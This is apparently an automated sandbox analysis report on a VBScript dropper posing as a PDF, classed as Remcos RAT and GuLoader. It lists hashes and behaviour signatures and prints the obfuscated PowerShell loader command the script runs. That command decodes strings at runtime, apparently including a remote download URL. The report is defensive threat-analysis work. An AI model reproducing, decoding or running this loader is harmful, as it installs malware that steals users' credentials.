Edit tour
Windows
Analysis Report
MV STARSHIP AQUILA_pdf.vbs
Overview
General Information
| Sample name: | MV STARSHIP AQUILA_pdf.vbs |
| Analysis ID: | 1530551 |
| MD5: | 427c143dcebde77d0881da0589b0392f |
| SHA1: | 732631d0993cb724e8e93dd146e871026e5a4874 |
| SHA256: | fd352ed76e51602f74cdf8305a6da9386d70909e91f72fbce124afe3a911322a |
| Tags: | RATRemcosRATvbsuser-abuse_ch |
| Infos: |   |
 | |
Detection
Remcos, GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for domain / URL
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Potential malicious VBS script found (suspicious strings)
Powershell creates an autostart link
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64
wscript.exe (PID: 1376 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\MV ST ARSHIP AQU ILA_pdf.vb s" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 4948 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" " <#slagts tavles Tal epdagogs R egnskabsaf delings Wa rdwomen Yo keage #>;$ Ganespalte r144='Triu mferne';<# Whirler Kj epladser F llesmngde #>;$Gader= $adawe+$ho st.UI;If ( $Gader) {$ Fuglearter ++;}functi on Drunkom eter($Micr ofibril){$ Reflation= $Elektromo toren+$Mic rofibril.' Length'-$F uglearter; for( $Apo plastogamo us=3;$Apop lastogamou s -lt $Ref lation;$Ap oplastogam ous+=4){$W ettability ='Compotat ion';$Forb rugermotiv eringer223 +=$Microfi bril[$Apop lastogamou s];$Dimeti ent='Remem berers';}$ Forbrugerm otiveringe r223;}func tion Fusio nsdokument et($Achlor hydria){ & ($Companio ning) ($Ac hlorhydria );}$Malie= Drunkomete r 'smaM un ospuz kaiP rolplal ss aO,s/ste5D ep. la0Rep sca( rWB, uiD.mnResd VekoFa wC ms ud BifN FreTRoi Ko g1Bes0Apo. Cal0sip;Fi r eW B.iP rnsto6pro 4 at; Ni a bexCa.6Ma 4 ct;Ite G ulrsu,vsev :kos1 la2s .l1 Gr.The 0Ged)Udk s ubGBone Do cBl kg,los te/Pre2Pon 0Mat1 Un0R eh0F.r1Emb 0Dod1Dyp B reFHypiCha rsnae spf amo R xPla /Ha.1 u2H t1Goi.run0 D,r ';$Par titioned=D runkometer 'Domuou,s U teNonR E l-CocaGerG EddeRhoNT gtInd ';$K onkursbeha ndlingens= Drunkomete r 'dephDat t.lmtPispC u:In /Cli / jee stq P u C iIns pBud4 K .T i.sAnahGel oTheppon/C hiF unvAvl MNymV ModE elpOveFslu g,ra/ExtAs aftEn oHol lTrosWov.C ivrAstaP.a rMer ';$Af spadsering spenge=Dru nkometer ' s,a>Dif '; $Companion ing=Drunko meter ' ui BrEC.xXMi k ';$Congr essist='Ba nditter';$ Flunkeyhoo d='\Plasma gel.Ref';F usionsdoku mentet (Dr unkometer ' R $,drGI s l oOga B Ex Aseklat t:Tr,ILrer MumRsvvIsp aGantAskyb AcalencyEp a=La,$s,vE B NCanvR a:Renast P HigpsupD B oa ssTFika f+Rin$Mul FPhelsugu, erNsenksal eTesy OpHC looveoBe. DBrn ');Fu sionsdokum entet (Dru nkometer ' Bip$Hypg T LKrooMarB Ta A.shlba s:Vanb ndA R.cD ale r iFPleo TjR s lms oAsp ra Cal R E M T,ri=Un f$Tr K noo Noun ftKMi suKrirP,ds LasBForE s kHIntANo N safD,ecL.u gI N nBlag H.e,einsp s su.Thes colPLamLMa air,iTRib( fo$ ChaCo f PlsUd.P PupaResdAe s lyEUptR B liB kN s oG ,dsBisP NgteUd.N C G,niePsa) Ac ');Fus ionsdokume ntet (Drun kometer 'T io[chinU i E veTifr.s alsEleE Un r favAulIH lCst.eQua psenoRapIB a,NA eTK l M Kra A.N BeABioGReg e ImRByl]s am:Re : Ty s iEcopCLe oUGrur GaI EndtHeaY a ppAf.rUnro FutTParO C oCspao roL sp U.v=Jor on[TorNdu kEetat o.N o.s .oE b. cAriU A,rp omi anTL,e YLftPUroRP roOPhitMal OLntC Dio orLRumt Ud YAlap VaEs r]Ani: on :OrdTPauld atsAba1Bld 2Dis ');$K onkursbeha ndlingens= $Badeforma alet[0];$T ilkendegiv elsers=(Dr unkometer 'Ma $Te.g, ynLwhoORe, bUnsAK slP se: reHAdd i.ndlNonIP lu=UfonAlk e ,eWMas-U dlOViob ur jsniEBeaCD istElf Op sB sytahss eeTKlae iv MI,o. alNB